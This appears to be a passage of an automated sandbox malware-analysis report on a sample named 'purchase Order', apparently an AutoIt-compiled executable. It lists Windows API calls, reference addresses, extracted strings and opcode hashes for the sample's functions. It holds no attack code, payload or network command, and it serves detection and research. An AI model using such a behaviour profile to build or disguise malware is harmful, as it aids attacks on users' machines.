                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction Fuzzy Hash: D7019278A00109EFCB45DF98C5909AEFBB5FB48710F20859DD809A7345D730AE41DB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction ID: d6ad933a5bd70b7912e78c449ea5b3e5a72edc8fe4e5f4700ba6312a1ea0cfed
                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction Fuzzy Hash: 55019278A00109EFCB44DF98C5909AEFBB5FB88710F20859DD819A7345DB30AE51DB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00C9A2FE
                                                        • DeleteObject.GDI32(00000000), ref: 00C9A310
                                                        • DestroyWindow.USER32 ref: 00C9A31E
                                                        • GetDesktopWindow.USER32 ref: 00C9A338
                                                        • GetWindowRect.USER32(00000000), ref: 00C9A33F
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C9A480
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C9A490
                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A4D8
                                                        • GetClientRect.USER32(00000000,?), ref: 00C9A4E4
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C9A51E
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A540
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A553
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A55E
                                                        • GlobalLock.KERNEL32(00000000), ref: 00C9A567
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A576
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00C9A57F
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A586
                                                        • GlobalFree.KERNEL32(00000000), ref: 00C9A591
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A5A3
                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CCD9BC,00000000), ref: 00C9A5B9
                                                        • GlobalFree.KERNEL32(00000000), ref: 00C9A5C9
                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C9A5EF
                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C9A60E
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A630
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A81D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-3613752883
                                                        • Opcode ID: e23de51b347763a66f31e49e1396c13b2c91a0bf21a34eeabf9db86b00e74571
                                                        • Instruction ID: 82b62888e744bcb8176ff13e80990a8f327f6c3963fa3e2ea94e0c6bd5e652fc
                                                        • Opcode Fuzzy Hash: e23de51b347763a66f31e49e1396c13b2c91a0bf21a34eeabf9db86b00e74571
                                                        • Instruction Fuzzy Hash: 1A025A75900214EFDB14DFA4CD89FAE7BB9FB48310F148558F916AB2A1CB70AD41CBA0
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 00CAD2DB
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00CAD30C
                                                        • GetSysColor.USER32(0000000F), ref: 00CAD318
                                                        • SetBkColor.GDI32(?,000000FF), ref: 00CAD332
                                                        • SelectObject.GDI32(?,00000000), ref: 00CAD341
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00CAD36C
                                                        • GetSysColor.USER32(00000010), ref: 00CAD374
                                                        • CreateSolidBrush.GDI32(00000000), ref: 00CAD37B
                                                        • FrameRect.USER32(?,?,00000000), ref: 00CAD38A
                                                        • DeleteObject.GDI32(00000000), ref: 00CAD391
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00CAD3DC
                                                        • FillRect.USER32(?,?,00000000), ref: 00CAD40E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00CAD439
                                                          • Part of subcall function 00CAD575: GetSysColor.USER32(00000012), ref: 00CAD5AE
                                                          • Part of subcall function 00CAD575: SetTextColor.GDI32(?,?), ref: 00CAD5B2
                                                          • Part of subcall function 00CAD575: GetSysColorBrush.USER32(0000000F), ref: 00CAD5C8
                                                          • Part of subcall function 00CAD575: GetSysColor.USER32(0000000F), ref: 00CAD5D3
                                                          • Part of subcall function 00CAD575: GetSysColor.USER32(00000011), ref: 00CAD5F0
                                                          • Part of subcall function 00CAD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CAD5FE
                                                          • Part of subcall function 00CAD575: SelectObject.GDI32(?,00000000), ref: 00CAD60F
                                                          • Part of subcall function 00CAD575: SetBkColor.GDI32(?,00000000), ref: 00CAD618
                                                          • Part of subcall function 00CAD575: SelectObject.GDI32(?,?), ref: 00CAD625
                                                          • Part of subcall function 00CAD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00CAD644
                                                          • Part of subcall function 00CAD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CAD65B
                                                          • Part of subcall function 00CAD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00CAD670
                                                          • Part of subcall function 00CAD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CAD698
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID: @U=u
                                                        • API String ID: 3521893082-2594219639
                                                        • Opcode ID: f51882f348542ae5331b20720044165e329ff7ba28ba10e70b011e6c604d43c4
                                                        • Instruction ID: d9f80265323d6a1abb2227a0fa9c8b40b25a52f2132ed88de7e98679a065f1e4
                                                        • Opcode Fuzzy Hash: f51882f348542ae5331b20720044165e329ff7ba28ba10e70b011e6c604d43c4
                                                        • Instruction Fuzzy Hash: 29916EB1409302BFDB109F64DC48F6FBBA9FB89325F100A29F963961A0D771E945CB52
                                                        APIs
                                                        • DestroyWindow.USER32 ref: 00C5B98B
                                                        • DeleteObject.GDI32(00000000), ref: 00C5B9CD
                                                        • DeleteObject.GDI32(00000000), ref: 00C5B9D8
                                                        • DestroyIcon.USER32(00000000), ref: 00C5B9E3
                                                        • DestroyWindow.USER32(00000000), ref: 00C5B9EE
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00CBD2AA
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00CBD2E3
                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00CBD711
                                                          • Part of subcall function 00C5B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C5B759,?,00000000,?,?,?,?,00C5B72B,00000000,?), ref: 00C5BA58
                                                        • SendMessageW.USER32 ref: 00CBD758
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00CBD76F
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00CBD785
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00CBD790
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                        • String ID: 0$@U=u
                                                        • API String ID: 464785882-975001249
                                                        • Opcode ID: 408247fe8ae717a3eead802bc9f7f92adcdcc1ae376b9676862701a325ab6c63
                                                        • Instruction ID: 23614f00de7961d18ad77e0a44a0ce810bb0dd1c8a108d8fb52c66c63e84f6fe
                                                        • Opcode Fuzzy Hash: 408247fe8ae717a3eead802bc9f7f92adcdcc1ae376b9676862701a325ab6c63
                                                        • Instruction Fuzzy Hash: 5F129B742042029FDB21CF28C884BA9BBF5FF05305F144569F99ACB262DB31ED86DB91
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 00CAD5AE
                                                        • SetTextColor.GDI32(?,?), ref: 00CAD5B2
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00CAD5C8
                                                        • GetSysColor.USER32(0000000F), ref: 00CAD5D3
                                                        • CreateSolidBrush.GDI32(?), ref: 00CAD5D8
                                                        • GetSysColor.USER32(00000011), ref: 00CAD5F0
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CAD5FE
                                                        • SelectObject.GDI32(?,00000000), ref: 00CAD60F
                                                        • SetBkColor.GDI32(?,00000000), ref: 00CAD618
                                                        • SelectObject.GDI32(?,?), ref: 00CAD625
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00CAD644
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CAD65B
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00CAD670
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CAD698
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CAD6BF
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00CAD6DD
                                                        • DrawFocusRect.USER32(?,?), ref: 00CAD6E8
                                                        • GetSysColor.USER32(00000011), ref: 00CAD6F6
                                                        • SetTextColor.GDI32(?,00000000), ref: 00CAD6FE
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CAD712
                                                        • SelectObject.GDI32(?,00CAD2A5), ref: 00CAD729
                                                        • DeleteObject.GDI32(?), ref: 00CAD734
                                                        • SelectObject.GDI32(?,?), ref: 00CAD73A
                                                        • DeleteObject.GDI32(?), ref: 00CAD73F
                                                        • SetTextColor.GDI32(?,?), ref: 00CAD745
                                                        • SetBkColor.GDI32(?,?), ref: 00CAD74F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID: @U=u
                                                        • API String ID: 1996641542-2594219639
                                                        • Opcode ID: 4d34e5859c374733c1871dc1b22bd7bbcf0aeb5bef8ca2b4e3794acef85b31cf
                                                        • Instruction ID: d1734d06d171f03b2afddc10c079d0dc46444eaa60efcdde948b1b4636695254
                                                        • Opcode Fuzzy Hash: 4d34e5859c374733c1871dc1b22bd7bbcf0aeb5bef8ca2b4e3794acef85b31cf
                                                        • Instruction Fuzzy Hash: F3513BB1900209AFDB109FA8DC48FAEBB79FB09324F144525F927AB2A1D7719A41DF50
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00C8DBD6
                                                        • GetDriveTypeW.KERNEL32(?,00CDDC54,?,\\.\,00CDDC00), ref: 00C8DCC3
                                                        • SetErrorMode.KERNEL32(00000000,00CDDC54,?,\\.\,00CDDC00), ref: 00C8DE29
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 67b859e1bc06f2f2d7b6543e468c34952978dcf2631d87163ae766392f369c18
                                                        • Instruction ID: 44b3fe8ad2bf16352c35258f5c3623a105a8a8706d16f62fbf437616e879ae00
                                                        • Opcode Fuzzy Hash: 67b859e1bc06f2f2d7b6543e468c34952978dcf2631d87163ae766392f369c18
                                                        • Instruction Fuzzy Hash: 0551B130248346BBC650FF12C892939B7A0FB94709F20492AF5179B2E1DB70DA45EB5B
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00CAC788
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00CAC83E
                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00CAC859
                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00CACB15
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: 0$@U=u
                                                        • API String ID: 2326795674-975001249
                                                        • Opcode ID: 9d98b196c1295a8593ce4229a44b80626eb8dc6bc15e4c56730c5c495f090bdf
                                                        • Instruction ID: 3d9638d25ad943c8b12951b035f5cb8ea5cacfb114babf9f0b4e9a42f590dcbe
                                                        • Opcode Fuzzy Hash: 9d98b196c1295a8593ce4229a44b80626eb8dc6bc15e4c56730c5c495f090bdf
                                                        • Instruction Fuzzy Hash: 53F1C371104302AFD7258F28CCC9BAABBE4FF4A358F04052DF5A9D62A1C775CA45DBA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: 9329ce8610e421eff401e957dd77c96d000fd67e17ac8b4c9195eaa297b740fe
                                                        • Instruction ID: 3177dce9d9279cfc0b184b5ec9a61c996d81c547e18765ca7b202c631c6eda0d
                                                        • Opcode Fuzzy Hash: 9329ce8610e421eff401e957dd77c96d000fd67e17ac8b4c9195eaa297b740fe
                                                        • Instruction Fuzzy Hash: 3E812730A41215BBCB64AEA5CCC2FBB3768BF14701F084039FD06AB1D6EB60DA45D2A5
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,00CDDC00), ref: 00CA6449
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 3964851224-45149045
                                                        • Opcode ID: 047387e58b3bf9f90696955c9ee48e98b79dec5fee996cd70274f082f11864fc
                                                        • Instruction ID: 555d80a7d17eb989ec9d7d64e1c03107e96fc922379eabf943d8349c91a6c8bd
                                                        • Opcode Fuzzy Hash: 047387e58b3bf9f90696955c9ee48e98b79dec5fee996cd70274f082f11864fc
                                                        • Instruction Fuzzy Hash: D9C1A3742042168BCB08EF10C551A7F77A5AF96348F084859F9969B3E2DB30EE4ADB46
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CAB7B0
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CAB7C1
                                                        • CharNextW.USER32(0000014E), ref: 00CAB7F0
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CAB831
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CAB847
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CAB858
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CAB875
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00CAB8C7
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CAB8DD
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CAB90E
                                                        • _memset.LIBCMT ref: 00CAB933
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CAB97C
                                                        • _memset.LIBCMT ref: 00CAB9DB
                                                        • SendMessageW.USER32 ref: 00CABA05
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CABA5D
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00CABB0A
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00CABB2C
                                                        • GetMenuItemInfoW.USER32(?), ref: 00CABB76
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CABBA3
                                                        • DrawMenuBar.USER32(?), ref: 00CABBB2
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00CABBDA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0$@U=u
                                                        • API String ID: 1073566785-975001249
                                                        • Opcode ID: 606bbfa043a76650532f2bd0de4231ec252b627a6e33f40c5a16d8caaa264876
                                                        • Instruction ID: da71a14b736b0d45570c3ce94f6764670d3e81b5fa8d9af602e19a393a218a2f
                                                        • Opcode Fuzzy Hash: 606bbfa043a76650532f2bd0de4231ec252b627a6e33f40c5a16d8caaa264876
                                                        • Instruction Fuzzy Hash: 91E1907590021AABDB20DF65CC84FEE7B78FF06718F10815AF929AA192D7718E41DF60
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00CA778A
                                                        • GetDesktopWindow.USER32 ref: 00CA779F
                                                        • GetWindowRect.USER32(00000000), ref: 00CA77A6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00CA7808
                                                        • DestroyWindow.USER32(?), ref: 00CA7834
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CA785D
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA787B
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CA78A1
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00CA78B6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CA78C9
                                                        • IsWindowVisible.USER32(?), ref: 00CA78E9
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CA7904
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CA7918
                                                        • GetWindowRect.USER32(?,?), ref: 00CA7930
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00CA7956
                                                        • GetMonitorInfoW.USER32 ref: 00CA7970
                                                        • CopyRect.USER32(?,?), ref: 00CA7987
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00CA79F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 06e2753b4652c4eae1e115ba917396e15d201583821e6f9a3326a9faed735e31
                                                        • Instruction ID: ae645ce4d99a66c8c49e6995a512f6ac96b9f266dd43309f9bd82038bd787af4
                                                        • Opcode Fuzzy Hash: 06e2753b4652c4eae1e115ba917396e15d201583821e6f9a3326a9faed735e31
                                                        • Instruction Fuzzy Hash: 42B18B71608301AFDB04DF64C948B6EBBE4FF89314F008A1DF59A9B291DB70E945CB92
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C86CFB
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C86D21
                                                        • _wcscpy.LIBCMT ref: 00C86D4F
                                                        • _wcscmp.LIBCMT ref: 00C86D5A
                                                        • _wcscat.LIBCMT ref: 00C86D70
                                                        • _wcsstr.LIBCMT ref: 00C86D7B
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C86D97
